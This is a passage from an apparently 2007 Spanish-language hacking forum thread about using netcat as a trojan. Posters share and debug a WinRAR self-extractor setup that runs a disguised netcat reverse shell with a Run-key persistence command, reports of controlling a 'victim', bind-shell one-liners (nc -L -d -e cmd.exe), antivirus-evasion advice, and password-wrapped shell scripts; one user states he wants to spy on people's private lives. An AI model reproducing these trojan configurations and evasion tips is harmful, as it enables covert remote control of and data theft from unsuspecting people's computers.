for /f %%i in (ips.txt) do netstat -n|find "%%i" && CMD
Echo Te has desconectado del servidor remoto.
Exit

gracias ;D


Título: Re: Jugando con netcat
Publicado por: lll_swamp_lll en 15 Octubre 2007, 00:40 am
le pones lo que sea.. despues con la opción -e del netcat le das la ruta del bat


Título: Re: Jugando con netcat
Publicado por: TheBenjoO en 15 Octubre 2007, 02:01 am
gracias  ;D


Título: Re: Jugando con netcat
Publicado por: Thylzos en 16 Octubre 2007, 16:02 pm
Che, estoy comenzando a ver el tutorial, pero las imágenes no puedo verlas, ¿podes renovarlas?


Título: Re: Jugando con netcat
Publicado por: crbl en 22 Octubre 2007, 23:09 pm
Hola...estuve leyendo tus instrucciones orque quiero aprender a usar troyanos, aunque puede que este un poco viejo para eso. El motivo es que viajo mucho y tengo pcs repartidos por varios lugares y en todos tengo cosas diferentes, de modo que siempre me falta algo en el pendrive.....obviamente me gustaría saber tb para entrar a los pcs de algunos personajes de los cuales me interesa saber algo de sus vidas privadas, no para hacer daño ni nada por el estilo solo para obtener información y esa información utilizarla como enganche, generalmente cuando sabes algo importante de otro sin que el otro sepa que lo sabes, pero si le das a enteneder que estás en la misma sintonía, el otro se siente mas identificado y se abre más contigo, lo que te ayuda aobtener ventajas comerciales.
Si me uedes ayudar sería super interesante, asi que como primera pregunta aunque suene lammer (como se que le dicen a los que no sabemos de esto).....de donde descargo el "netcat" sin que venga con sorpresas???
Gracias y slds.


Título: Re: Jugando con netcat
Publicado por: lll_swamp_lll en 24 Octubre 2007, 03:50 am
Leete la tercera ezine de isirius, ahi también explica un poco acerca de Juganco con cryptcat... muy similar a este tema.

http://insecurity.yethost.com/2007/10/12/28/
http://insecurity.yethost.com/2007/10/07/herramientas-insecurity/


Título: Re: Jugando con netcat
Publicado por: SpiderNet en 25 Octubre 2007, 06:23 am
Este ejercicio es muy visto.... OK

Pero por pue cuando entre como visitante vei el texto original desde el inicio (sin imagenes) y al registrarme ahora no aparece por ningun lado.


?????


Título: Re: Jugando con netcat
Publicado por: WHK en 25 Octubre 2007, 15:05 pm
Las imagenes ya no existen porque imageshack ya me expiró, subirimagenes también, sitehacking ya no existe e iespana no deja linkear imagenes.


Título: Re: Jugando con netcat
Publicado por: Thylzos en 25 Octubre 2007, 15:35 pm
Las imagenes ya no existen porque imageshack ya me expiró, subirimagenes también, sitehacking ya no existe e iespana no deja linkear imagenes.

Joder que mala suerte, ¿me podés pasar la que sea que iba después de: "Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:"?, gracias


Título: Re: Jugando con netcat
Publicado por: WHK en 25 Octubre 2007, 15:52 pm
Creo que alguien lo había puesto en su foro con los documentos respaldados en doc y pdf, al parecer era en new-bytes o si no los subo otraves a rapidshare o esperan a que llegue a mi casa para colgarlo en iespana.


Título: Re: Jugando con netcat
Publicado por: WHK en 25 Octubre 2007, 15:53 pm
Lamentable... acabo de ver que necesitas estar registrado para ver el foro asi que mejor lo subiré a mi sitio hoy en la noche. despues les aviso. De todas formas cualquier duda pueden preguntar acá mismo.


Título: Re: Jugando con netcat
Publicado por: Thylzos en 25 Octubre 2007, 16:42 pm
Gracias, yo lo unico que quería era ver eso... cuando lo tengas avisame :)


Título: Re: Jugando con netcat
Publicado por: WHK en 26 Octubre 2007, 02:04 am
Listo http://512.iespana.es/?page_id=7


Título: Re: Jugando con netcat
Publicado por: Thylzos en 26 Octubre 2007, 14:49 pm
Listo http://512.iespana.es/?page_id=7

Muchas gracias ;).


Título: Re: Jugando con netcat
Publicado por: crbl en 30 Octubre 2007, 01:54 am
SWAMP...se agradece el aporte, gracias por esponder
Slds y suerte
CRBL


Título: Re: Jugando con netcat
Publicado por: vatox100pre en 30 Octubre 2007, 18:49 pm
Hola vatos de este gran foro weno saben necesito una ayuda con el tema Jugando Con netcat 1.1 weno estoy intentando hacer este tipo de conexion pero que sea pipeleada weno mas o menos eh configurado el nc con el win rar de esta forma :

Ruta d Extraccion:
%homedrive%%homepath%\update

Ejecutar tras la extraccion
"%homedrive%%windir%\system32\cmd.exe" /c iexplorer.exe -d 192.168.1.16 21 | cmd.exe | iexplorer.exe -d 192.168.1.16 25

Ejecutar antes de la extraccion
%windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d 192.168.1.16 21 | cmd.exe | iexplorer.exe -d 192.168.1.16 25" /f > nul

Como se muestra en la imagen

(http://img514.imageshack.us/img514/495/configuracionqq9.th.jpg)

Al final de toda la configuracion y claro despues de cambiar de icono y de renombrarlo lo ejecuto y me sale este error

(http://img118.imageshack.us/img118/3104/errordelashelllc6.th.jpg)


Weno no se en donde puede estar la falla haber si alguien me ayuda con esto.
pa salir de la duda  hasta pronto y espero alguna respuesta.





Título: Re: Jugando con netcat
Publicado por: vatox100pre en 30 Octubre 2007, 18:55 pm
UPs creo que las imagenes me salieron muy chiquitas pero weno este es el error

windows no puede encontrar el archivo"C:C:\windowssystem32cmd.exe". Asegurese de que la ruta y el nombre de archivo estan escrito correctamente y vuelve a intentarlo, para buscar un archivo, haga click en el boton inicio y luego en buscar

espero me ayuden hasta pronto brothers


Título: Re: Jugando con netcat
Publicado por: Unnamed en 31 Octubre 2007, 01:05 am
UPs creo que las imagenes me salieron muy chiquitas pero weno este es el error

"C:C:\windowssystem32cmd.exe".

Fijate bien la ruta. C:C:\ ahi esta el error


Título: Re: Jugando con netcat
Publicado por: vatox100pre en 31 Octubre 2007, 02:26 am
Hola brother weno creo que para eso puse esta configuracion

Ruta d Extraccion:
%homedrive%%homepath%\update

Ejecutar tras la extraccion
"%homedrive%%windir%\system32\cmd.exe" /c iexplorer.exe -d 192.168.1.16 21 | cmd.exe | iexplorer.exe -d 192.168.1.16 25

Ejecutar antes de la extraccion
%windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d 192.168.1.16 21 | cmd.exe | iexplorer.exe -d 192.168.1.16 25" /f > nul

para que me digas en que toy fallando ya intente sacando el %homedrive% pero me sale un tambien error que puede ser ya intente sacando todos los 
%homedrive% se supone que es el C:/ pero nada mira mi configuracion y haber si me dices en que toy mal.


Título: Re: Jugando con netcat
Publicado por: WHK en 31 Octubre 2007, 14:07 pm
Código:
C:\Documents and Settings\Administrador>echo %homedrive%%homepath%
C:\Documents and Settings\Administrador

Código:
C:\Documents and Settings\Administrador>echo %homedrive%%windir%
C:C:\WINDOWS

Reemplaza %homedrive%%windir% por %windir%

Código:
Ejecutar tras la extraccion
"%homedrive%%windir%\system32\cmd.exe" /c iexplorer.exe -d 192.168.1.16 21 | cmd.exe | iexplorer.exe -d 192.168.1.16 25

Reemplazalo por:
Código:
Ejecutar tras la extraccion
"%windir%\system32\cmd.exe" /c iexplorer.exe -d 192.168.1.16 21 | cmd.exe | iexplorer.exe -d 192.168.1.16 25


Título: Re: Jugando con netcat
Publicado por: vatox100pre en 31 Octubre 2007, 17:20 pm
Hola hermano weno la conexion me salio exitosa xevere pero hay un problema en la maquina victima me queda una ventana de DOS sin ningun parametro solo una ventana negra naa mas,  weno mientras esa ventanita esta activa  puedo desde mi maquina controlarla y a la vez navegar por todo sus unidades pero cuando cierro la ventanita de DOS en la maquina remota ps ya no me deja hacer nada pero la maquina sigue conectada a mi pc a que se debe??? desde ya mis saludos para toda la comunidad.


Título: Re: Jugando con netcat
Publicado por: Zykl0n-B en 31 Octubre 2007, 23:02 pm
¡Venga! ¿Una ventana negra sin parámetros?
La única forma de que a tu víctima le aparezca una ventana negra es que no estés indicándole a Netcat el modo "Detach" ó "Separado", revisa bien ese código..
Saludos.

 ;D


Título: Re: Jugando con netcat
Publicado por: vatox100pre en 31 Octubre 2007, 23:35 pm
Hola men weno si te refieres a esto -d ps creo que la configuracion que me da WHK esta bien los parametros -d estan antes de la IP que mas puede ser???


Título: Re: Jugando con netcat
Publicado por: Zykl0n-B en 5 Noviembre 2007, 11:49 am
¡Venga! no había leído tus Posts de "Jugando con Netcat" detenidamente...
En el número 3 dices "Poner contraseñas" Pero sólo haces que verifique las IP's.. Esas no son contraseñas, aquí les dejo un Batch que pide Usuario y Password, y si no escriben el correcto, Pa' fuera van xD

Funciona parecido al del manual de WHK, 2 archivos, aquí les dejo el código:

Servidor.bat
Citar
@echo off
Echo \\\\\\\\\\\\\\\\ZONA PROTEGIDA/////////////////
Echo Estas conectandote con el servidor de Zykl0n-B
Echo Por favor, Identificate.
Echo Nombre de Usuario:
set/p user1=
if %user1%==Zykl0n (goto gooduser) else goto baduser
:gooduser
Echo.
Echo El usuario %user1% es correcto,
Echo ahora introduce tu Password:
set/p pass1=
if %pass1%==mypassword (goto goodpass) else goto badpass
:baduser
Echo Tu nombre de usuario es Incorrecto
pause
exit
:goodpass
@Cls
Echo Bienvenido %user1%! && cmd.exe
Echo La Conexion ha terminado.
pause
exit
:badpass
Echo Password incorrecto
pause
exit

Ese vendrá siendo el Servidor, ahora el archivo que hace correr a Netcat y que hace correr el Server:

Run Server.bat

Citar
@Echo off
start nc -d -e servidor.bat -L -p 33333

Venga, Gracias a WHK por haber publicado esos manuales, no habría pensado en "Netcat con Passwords" :p , venga, espero que les sirva.
Saludos


Título: Re: Jugando con netcat
Publicado por: D4RIO en 6 Noviembre 2007, 04:50 am
Hey, si querés seguridad te conviene pasar la parte de comprobar password a un ejecutable para que no se pueda ver el fuente...a parte podés dejar el proceso corriendo, hacerlo persistente, usar md5...lo que quieras...Lo podés hacer en C++, o bien en C.

Lo que quería era hacer una pequeña colaboración:: Podemos entablar un chat con un equipo que no tenga netcat así::

En nuestro equipo ponemos "nc -vv -l -p 5000" (por ejemplo)... y en el otro vamos vía telnet poniendo "telnet nuestra_ip_o_dns" o sea que puede ser, en mi caso, "telnet darioweb.noip.org"... así podemos chatear via consola con amigos que no tengan netcat...y también podemos mantener una parte de nuestro "paquete" invisible a los antivirus mientras nos informamos acerca de la ip y otros datos que nos interesen para hacer un nuevo intento más adelante . . .

OTRO:
Podemos no desear que nuestra ip o dns esté grabado en la máquina del otro...en ese caso le dejamos un nc.exe pero lo ponemos a la escucha (en algún puerto bien raro, que puede ser elegido al azar, y descubierto con un escaneo de puertos)...
El nc a la escucha también puede ejecutar un comando al recibir conexión, con lo que:::.

nc -l -e cmd.exe -p 38000

sería un ejemplo...y nosotros conectaríamos simplemente con ejecutar "nc host_rmoto 38000"...(y añadir -vv si hay problemas)

Buen truco no?? el tema es que cualquiera puede conectarse a la máquina con sólo hacer un rápido escaneo de puertos...y en poco tiempo llega a escanear un montón:::..


Título: Re: Jugando con netcat
Publicado por: hacklam en 6 Noviembre 2007, 23:32 pm
Muy buenas respuestas y un buen foro que creo q tiene futuro.

Seguir así  ;)

asturkillers.mundoforo.com (http://asturkillers.mundoforo.com)


Título: Re: Jugando con netcat
Publicado por: carlipus en 8 Noviembre 2007, 15:36 pm
Una vez hago el server de netcat con conexión inversa...se la mando a mi victima metido en el winrar, pero... su antivirus lo elimina...y por tanto no puedo tener acceso!

Alguna idea?


Título: Re: Jugando con netcat
Publicado por: Crazy.sx en 8 Noviembre 2007, 16:19 pm
Acá dejo un code en batch que hice. Un útil manual que posteé. Posible solucion Antivirus (mayoría).

link del post : http://foro.elhacker.net/index.php/topic,186544.0.html

Saludos a la comunidad


Título: Re: Jugando con netcat
Publicado por: carlipus en 8 Noviembre 2007, 16:55 pm
pero no me queda claro, haciendo todo eso de ese post, a la victima le aparece que es un virus, no se si se podrá hacer indetectable este servidor de netcat xq algunos av lo detectan

Y para mandarselo por msn el server, hay que meterle en winrar o winzip, no se puede de otra forma no?



Título: Re: Jugando con netcat
Publicado por: D4RIO en 8 Noviembre 2007, 22:47 pm
Amigos, ahi es donde entra en juego su creatividad como hackers . . . si el antivirus te molesta, encontrale la vuelta y burlalo...apagalo, detenelo, engañalo, rebuscatelas para cambiar el server y hacerlo indetectable...usá joiners, utilidades anti-antivirus:::. No se crean que los hackers tienen algun secreto como "apagar-antivirus" y listo... hay que leer, informarse .. y usar la materia griss (y la materia google) :xD

(A parte eso ya se hablo)


Título: Jugando con netcat
Publicado por: lethalshot en 9 Noviembre 2007, 11:31 am
hola amigos, si alguien me pudiera ayudar para poder troyanizar al netcat.
si bien lo he encontrado en http://foro.elhacker.net/index.php/topic,159799.0.html, pero no salen las imágenes. gracias de antemano y estaré atento a su respuesta


Título: Re: Jugando con netcat
Publicado por: WannaBeHacker en 9 Noviembre 2007, 12:01 pm
hola amigos, si alguien me pudiera ayudar para poder troyanizar al netcat.
si bien lo he encontrado en http://foro.elhacker.net/index.php/topic,159799.0.html, pero no salen las imágenes. gracias de antemano y estaré atento a su respuesta

http://512.iespana.es/?page_id=7

Saludos


Título: Re: Jugando con netcat
Publicado por: lethalshot en 9 Noviembre 2007, 19:06 pm
gracias WannaBeHacker  por tomarte tu tiempo. ahora sí tengo las herramientas para troyanizar mi netcat..
                                          saludos



Título: Re: Jugando con netcat
Publicado por: softdates en 10 Noviembre 2007, 22:46 pm
alguien sabe porque al conectarme por shell directa con nc -L -d -e cmd.exe -p 21
me conecta me sale puerto abierto pero demora una eternidad aparte que a veces se cuelga y salen simbolos extraños durante la conexión cabe mencionar que las dos maquinas con wind 98 SE y no tienen internet es un red interna en el trabajo.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 11 Noviembre 2007, 19:11 pm
cuando pones nc y usas el modificador -L no estás haciendo una conexión, solamente estás poniento el puerto que especifiques a la escucha. Se quedará a la escucha hasta que la otra shell ejecute la conexión con tu máquina por el puerto abierto.

En el caso podés usar simplemente "nc numero_ip 21" desde la otra shell y tenés la conexión.

No tiene porqué tardar...yo hice conexiónes a shells remotas y la conexión es casi inmediata...y eso que las hice en la "gran red"...


Título: Re: Jugando con netcat
Publicado por: softdates en 11 Noviembre 2007, 23:57 pm
D4RIO quiese decir en la maquina victima esta nc -L -d -e cmd.exe -p 21

y yo me conecto con la ip ejemplo nc 10.10.42.43 21 pero demora un chorro en conectarse para luego cerrarse por hay mismo.

indico las maquinas son wind 98 se


Título: Re: Jugando con netcat
Publicado por: D4RIO en 12 Noviembre 2007, 05:27 am
Entonces tu problema debe ser un firewall, lo extraño es que no te diga que te deniega la conexión. Conectando de Linux a Linux no me tarda nada...

Intentá hacer un ping a la ip para ver si el problema está en la conexión (o el número de ip), o si netcat está siendo "inhibido" por otra cosa.


Título: Re: Jugando con netcat
Publicado por: BaKuRiUM en 13 Noviembre 2007, 15:16 pm
El problema lo estan teniendo a la hora de crear el ejecutable con el reshacker, ya que lo que se propone es cambiar el icono del nc, pero eso a veces da problemas, prueben crear el archivo final, pero sin cambiar el icono del nc, probablemente sea ese el problema

salu2


hola  bueno soy nuevo en este sitio y quisiera tomar cursos de CyC++ bueno ahora estoy aprendiena a manejar C#, pero yo quisiera manejar  c++, no se si me pudiera ayuudar. si me pueden dar manuales, etc. les agradeceria bastante ;) ;D


Título: Re: Jugando con netcat
Publicado por: WannaBeHacker en 13 Noviembre 2007, 23:49 pm
hola  bueno soy nuevo en este sitio y quisiera tomar cursos de CyC++ bueno ahora estoy aprendiena a manejar C#, pero yo quisiera manejar  c++, no se si me pudiera ayuudar. si me pueden dar manuales, etc. les agradeceria bastante ;) ;D

NO es el post adecuado para preguntarlo, ¿a qué viene eso?


Título: Re: Jugando con netcat
Publicado por: D4RIO en 14 Noviembre 2007, 20:41 pm
Tomar cursos?????   ;D  -- Cuando yo me dispuse a aprenderlo me trague una Enciclopedia de C++ de una biblioteca y me baje unos 10 manuales de internet....

EL CONOCIMIENTO NO VIENE POR OSMOSIS!!! - SE ADQUIERE CON ESFUERZO · · ·


Título: Re: Jugando con netcat
Publicado por: esteban0512 en 20 Noviembre 2007, 00:42 am
Código
  1. JAJAJAJJAJAJAJJJJJJJJJJJJJJJJJJJJJJJJJJJAAAAAAJAJAJAJJAJAJAJAJAJAJAJAJAJAJJAAJJAJAJAJAJAJAJAJAJ\
  2. GAGAGAGWH,XHEVJGYCEQHJCECE21D[code=actionscript]
[/code]


Título: Re: Jugando con netcat
Publicado por: softdates en 25 Noviembre 2007, 20:49 pm
D4RIO
gracias por contestar sobre mi problema con el netcat sobre el ping si lo hago es
 lo primero, para ver si hay repusta, al raro que sucede es que esa misma maquina esta infectada con el bifrost, y si me da conexión, incluso si hago una shell inversa con el modulo de el bifrost me conecta pero solo por un instante y luego se cae la conexión incluso se lo añadi al registro para que arranque automaticamente funciona pero igual se cae la conexion al parecer el ruteador esta configurado de tal manera de que solo ciertas conexiones se haga de punto a punto porque ya lo intente con otra maquina de la red el cual es Xp, hice lo mismo claro cambiando los parametros para que me deje pasar el firewall de xp y funcione con el cmd de xp, y me tira la conexion.

de todas maneras gracias


Título: Re: Jugando con netcat
Publicado por: Camacho21 en 30 Noviembre 2007, 07:50 am
Hola! por favor necesito que alguien me ayude con esto por favor, soy nuevo y me intereso este post sobre jugando con netcat... bueno el problema esta en que cuando intento transferir un archivo de una pc a otra ("Jugando con netcat parte V") se transfiere pero pesa 0 bytes! no se por que me pasa esto segui todos los pasos tal cual... y el archivo que al final se transfiere pesa 0 bytes! gracias de antemano...


Título: Re: Jugando con netcat
Publicado por: Zykl0n-B en 7 Diciembre 2007, 18:07 pm
Saludos a tod@s,
D4RIO:
Citar
Hey, si querés seguridad te conviene pasar la parte de comprobar password a un ejecutable para que no se pueda ver el fuente...a parte podés dejar el proceso corriendo, hacerlo persistente, usar md5...lo que quieras...Lo podés hacer en C++, o bien en C.

Vale, tienes razón, para los que no sepan pasar un Script Batch a "C" para poder compilarlo y obtener un Exe, acá les dejo un Script para Netcat mucho más "trabajado" por así decirlo que el que posteé hace unos días, vale, primero el Script Batch:

Código:
:main
@Echo off
Echo.
Echo      ////  /// /////// /////// /////// /////// ///////
Echo     ///// /// ///       ///   ///  //     ///   ///
Echo    /// ///// /////     ///   ///     ///////   ///
Echo   ///  //// ///       ///   ///  // //  ///   ///
Echo  ///   /// ///////   ///   /////// ///////   ///
Echo.
Echo               Security Shell (2007)
Echo                                     By: Zykl0n-B (c)
Echo.
Echo Esta sesi¢n est  protegida bajo Login,
Echo S¢lo Usuarios registrados pueden Acceder.
Echo.
Echo Login:
Set/p user1=
If %user1%==default (goto gooduser) Else goto baduser
:gooduser
Echo El nombre de Usuario %user1% es Correcto.
Echo Password:
Set/p passwd1=
If %passwd1%==default (goto accessgranted) Else goto accessdenied
:baduser
Echo El nombre de Usuario %user1% es Incorrecto.
Echo.
Echo             -* ACCESO DENEGADO *-
Echo.
Pause>nul
Exit
:accessgranted
Echo Login Completo... Remote Shell = OK!
Echo.
Echo =====================================================
Echo ­Bienvenido %user1%!
Echo  Fecha: %date%
Echo =====================================================
@CMD.EXE
Echo.
Echo                   -* Conexi¢n Finalizada *-
Echo.
Pause>nul
Exit
:accessdenied
Echo.
Echo El Password Introducido es Incorrecto,
Echo Por favor, Intente de nuevo.
Pause>nul
Goto main

Tanto el login como el Passwd son "default", por supuesto, lo puedes cambiar a tu preferencia.

Acá está en formato "Batch" ó de Procesamiento por lotes, sólo lo copias al Block de Notas, lo guardas como "Archivo.bat" y listo, tienes un Servidor con Autentificación de Usuario y Contraseña para las Shells de Netcat, pero acá surge el problema de que con un simple "Click secundario y Editar" tanto el Código fuente como tu Usuario y Contraseña quedarán revelados "En texto plano", pues, ¿Cuál es la solución?, pasarlo a un Ejecutable (Exe), acá les dejo el mismo Servidor, pero en formato de "C", veamos:

Código:
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int main(void)
{
char login[10];
char pass[10];
int contar=0;
  system("Echo.");
  system("Echo      ////  /// /////// /////// /////// /////// ///////");
  system("Echo     ///// /// ///       ///   ///  //     ///   ///");
  system("Echo    /// ///// /////     ///   ///     ///////   ///");
  system("Echo   ///  //// ///       ///   ///  // //  ///   ///");
  system("Echo  ///   /// ///////   ///   /////// ///////   ///");
  system("Echo.");
  system("Echo               Security Shell (2007)");
  system("Echo                                     By: Zykl0n-B (c)");
  system("Echo Esta sesion esta protegida bajo Login,");
  system("Echo Solo Usuarios registrados pueden acceder");
  system("Echo.");
do
{
system("Echo Login:");
gets(login);
system("Echo Password:");
gets(pass);
contar++;
}while(strcmp(login,"root")!=0 && strcmp(pass,"toor")!=1 || contar==3);
if(strcmp(login,"root")==0 && strcmp(pass,"toor")==0)
{

system("Echo.");
system("Echo ===================================================================");
system("Echo ¡Bienvenido!");
system("Echo Fecha: %date%");
system("Echo ===================================================================");
system("Echo.");
system("cmd.exe");   
system("Echo.");   
system("Echo               -* Conexi¢n Finalizada *-");
system("Echo.");
  return 0;
}
else
{
system("Echo Password Incorrecto,");
system("Echo Por favor intente luego.");
system("Echo.");
system("pause>nul && exit");
}
return 0;
}


Vaaaale vale, lo he cambiado un poco, pero es prácticamente lo mismo, te logueas como "root" y con el password "toor" (Sí sí, no es coincidencia, justo como en Backtrack)

¿Por qué he usado tanto "system("");"?, pues, utilizando "printf("");", Netcat no transfería el diálogo al host remoto, por lo que te logueabas "a ciegas", y dado a la presentación tan bonita que tiene el Script, preferí correrlo con recursos del Sistema.

Ya tus passwords no andan por ahi en texto plano, estás más "Seguro", Ah por cierto, pueden hacer lo mismo con cualquier archivo bat que se les antoje :P

Acá les dejo un Screenshot del Script "andando":

(http://i96.photobucket.com/albums/l194/SemashphorasH/nnnneeetttt.jpg)

Espero que les sirva, saludos.


Título: Re: Jugando con netcat
Publicado por: Zykl0n-B en 7 Diciembre 2007, 18:52 pm
Citar
Hola! por favor necesito que alguien me ayude con esto por favor, soy nuevo y me intereso este post sobre jugando con netcat... bueno el problema esta en que cuando intento transferir un archivo de una pc a otra ("Jugando con netcat parte V") se transfiere pero pesa 0 bytes! no se por que me pasa esto segui todos los pasos tal cual... y el archivo que al final se transfiere pesa 0 bytes! gracias de antemano...

No he leído el Post de "Jugando con Netcat parte V", pero supongo que puedo ayudarte,

Al transferir archivos debes especificar un nombre y extensión en el Cliente para el Archivo, si quieres transferir "Imagen.JPG" pues, en el cliente debes de especificarlo igual "Imagen.JPG", te dejo un Ejemplo:

Servidor:
Código:
C:\Mis videos>nc -v -L -p 999 <"Metallica - Motorbreath.avi"
listening on [any] 999 ...

Vale, el servidor ya te está dando información de que está a la escucha de algún cliente para transferirle el Archivo, ahora vamos con el cliente:

Código:
C:\Documents and settings\Zykl0n-B>nc 192.168.1.33 >"Metallica - Motorbreath.avi"
DNS fwd/rev mismatch: ZYKL0N-B != 192.168.1.33
ZYKL0N-B [192.168.1.33] 999 (?) open

Bien, como ves, ya la conexión está establecida, pero Netcat no te avisará "El archivo se está transfiriendo" ó "Se transfirió el archivo satifactoriamente"´, así que si es muy grande el archivo, espera un rato, y luego cierras la conexión.

Espero que te sirva.... Saludos.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 8 Diciembre 2007, 12:18 pm
Mmm...sobre esa implementación de C, está un poco a lo bruto:::.

Fijate: Usas system() para meter echo en la consola... pero si usas directamente printf() o cout en c++ lo haces más prolijo y efectivo.
Una implementación C++ sencilla y pelada sería algo asi:
Código
  1. #include<iostream>
  2. #include<string>
  3. #include<cstdlib>
  4. using namespace std;
  5.  
  6. /***************************
  7. *INICIALIZO VARIABLES
  8. ***************************/
  9. const string USER = "yo";
  10. const string PASS = "miPa55w0rd";
  11. const string RUSR = "ZZZ" ;
  12. const string RPWD = "ZZZ";
  13.  
  14. int COUNT = 0 ;
  15. bool LOGEAR = false ;
  16.  
  17.  
  18. /************
  19. *   M A I N
  20. *************/
  21. int main(void)
  22. {
  23.    //Entrada
  24.    cout << "SecureShell 2007::\n";
  25.    cout << "Bienvenido, por favor registrese ::\n\n";
  26.    cout << "User:";
  27.    cin  >> RUSR;
  28.    cout << "Password: ";
  29.    cin  >> RPWD;
  30.    //Primer Plato :: Comprobacion
  31.    if ( RUSR == USER && RPWD == PASS )
  32.    {
  33.      LOGEAR= true;
  34.    }
  35.    else
  36.    {
  37.  
  38.      //No te salio? :: Un par de intentos mas o no entras
  39.      while ( LOGEAR == false && COUNT < 4 )
  40.      {
  41.            cout << "\n(!) User o Password incorrecto\n";
  42.            cout << "Intentelo de nuevo ::\n\n";
  43.            cout << "User:";
  44.            cin  >> RUSR;
  45.            cout << "Password: ";
  46.            cin  >> RPWD;
  47.  
  48.            if ( RUSR == USER && RPWD == PASS )
  49.           {
  50.             LOGEAR= true;
  51.           };
  52.           COUNT++;
  53.      };//Fin While
  54.    };//Fin else
  55.  
  56.    if ( LOGEAR == true )
  57.    {
  58.      cout << "Login correcto\n";
  59.      cout << "Inicializando Shell :::::\n";
  60.      system("ssh-login"); // El cmd esta renombrado a ssh-login
  61.    }
  62.    else
  63.    {
  64.      cout << ":!: Login Fallido :!:\nByebye!!\n";
  65.    };
  66. return 0;
  67. }
  68.  

Y creo que eso funcionaría bien. Aunque también estuve experimentando hacer shells capadas... o sea que solamente permiten ciertos comandos, y eso se puede aplicar en conjunto con un login, para hacer que un usuario pueda ejecutar ciertas cosas y otro no.

Es cuestion de ser creativo:::.

BYEBYE!


Título: Re: Jugando con netcat
Publicado por: puaggg en 9 Diciembre 2007, 22:24 pm
una pregunta tonta...
soy nuevo nuevisimo en esto.
tengo el permiso d un colega y me ha retado ha entrar a su empresa y lo estoy intentando con netcat,pero..es posible entrar sin meter netcat como troyano ,me explico
a pelo sin enviar nada.solo desde mi pc. encontrar algun boquete y materme x ahi.
gracias de antamano.
seguire leyendo.
un saludo pa tos.


Título: Re: Jugando con netcat
Publicado por: Zykl0n-B en 10 Diciembre 2007, 00:16 am
Con respecto a D4RIO, dije mil y una vez, que al Programarlo en C, utilizando "Printf", netcat no transfería los datos, quedaba "A ciegas", y lo hice con System para hacercelo a todos más fácil, ¿Qué esperas? no todos son programadores Aquí, de la forma que lo hice es "Entendible" hasta por el más Newbie.

Con respecto a Puaggg, No, Netcat te da Acceso remoto funcionando como Cliente/Servidor, las 2 únicas formas de que ganes Acceso a la empresa de tu colega es que:

1.- Él deje un Netcat Escuchando por conexiones, y así, tú no tendrías que meter nada, sólo utilizar a Netcat como Cliente, Conectarte y Entrar.

2.-Que tu colega deje un Servidor telnet Activado, así sólo usarias a Netcat como cliente, y entrarías por Telnet.

Pero no sólo con Netcat, puedes Utilizar Exploits para entrar a la empresa, el mismo Netcat trae una función para Obtener datos de los servidores a los que se conecta, y así puedes investigar vulnerabilidades conocidas, visita Este foro (http://foro.netting.es/index.php), ahí he estado escribiendo y detallando varias cosas, entre ellas todas las funciones posibles de Netcat...

vale, Saludos.


Título: Re: Jugando con netcat
Publicado por: puaggg en 10 Diciembre 2007, 22:28 pm
gracias por la respuesta ciklon-b me voy paya a leer un rato.
un saludo.


Título: Re: Jugando con netcat
Publicado por: WannaBeHacker en 11 Diciembre 2007, 00:58 am
gracias por la respuesta ciklon-b me voy paya a leer un rato.
un saludo.


LOL, aprende a copiar y pegar el nick XD!


Título: Re: Jugando con netcat
Publicado por: D4RIO en 11 Diciembre 2007, 17:33 pm
 :huh: Es increible que alguien meta lengua nomas para crear conflicto...

Respecto a Zykl0n-B, no uso printf sino cout, y en mi experiencia, el shell remoto SI muestra todo lo que mando por cout a la salida. Por eso solo uso system() para llamar a cmd (que lo use renombrado).

Y por lo de los newbies ... creo que si un newbie desea comenzar a programar, entonces como buen hacker debe sentarse a leer un rato, y la programacion que uso en mi ejemplo se aprende en muy poco. Y claro, si lo que quiere un newbie es tener el programa sin importarle cómo funciona ni nada, que se dedique a otra cosa...

Y recordar:::

Las Shells remotas SI muestran la salida de cout o printf, y si no te sale es porque estas haciendo algo mal...te lo digo por experiencia, ya he programado shells capadas para usar en hosts remotos y uso cout deliberadamente::::::::::::::y funciona.

BYEBYE!


Título: Re: Jugando con netcat
Publicado por: SLOAN en 15 Diciembre 2007, 19:42 pm
Hola como etas quiero aprender como funciona el netcat ya lo hice download pero no lo puedo ejecutar tengo win xp. No encuentro ningun archivo .exe


Título: Re: Jugando con netcat
Publicado por: Zykl0n-B en 15 Diciembre 2007, 22:09 pm
Netcat originalmente fue hecho para plataformas UNIX, si no encuentras un "Exe" de seguro te bajaste una versión para UNIX, Weld Pond, del grupo L0pht, lo programó para entornos NT (Windows XP está basado en New Technology, "NT" ).

Bájalo directamente de acá:

Download (http://www.vulnwatch.org/netcat/nc111nt.zip)

Bajarás un ZIP con el código fuente, los Readme, y el binario ya compilado llamado "nc.exe".
Saludos.


Título: Re: Jugando con netcat
Publicado por: rasec87 en 15 Diciembre 2007, 23:06 pm
que de provecho puedo tener usando netcat, q puedo y no puedo hacer, y para q,, gracias de antemano,

PD: ahora q lei las reglas mejor pregunto antes q me baneen xD


Título: Re: Jugando con netcat
Publicado por: SLOAN en 16 Diciembre 2007, 08:14 am
hola Alguien me puede decir si netcat lo puedo usar con KNOPPIX DVD LIVE y como puedo instalarlo.
Gracias.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 16 Diciembre 2007, 11:03 am
SLOAN:
Si seguis sin poder extraer el nc.exe en Windows intenta desactivar el antivirus o la proteccion contra riskware y jokes.

rasec87:
Nadie te va a banear por hacer una pregunta... es decir, son normas del foro, no te van a hacer un juicio !  ;D
Respecto a tu duda, la ventaja de netcat es poder conectarse a través de TCP ó UDP bajo cualquier protocolo... eso significa que con netcat te podés conectar con servidores HTTP (Webs), FTP, SMTP... Incluso yo exerimente creando un "mini-protocolo" de chat para varios clientes. El poder manejar los protocolos manualmente te permite "jugar" con algunas cosas. En si, netcat no es más que una herramienta muy flexible, pero también muy rudimentaria, exactamente como una navaja suiza...no es una bomba atómica, pero no deja de ser muy util.
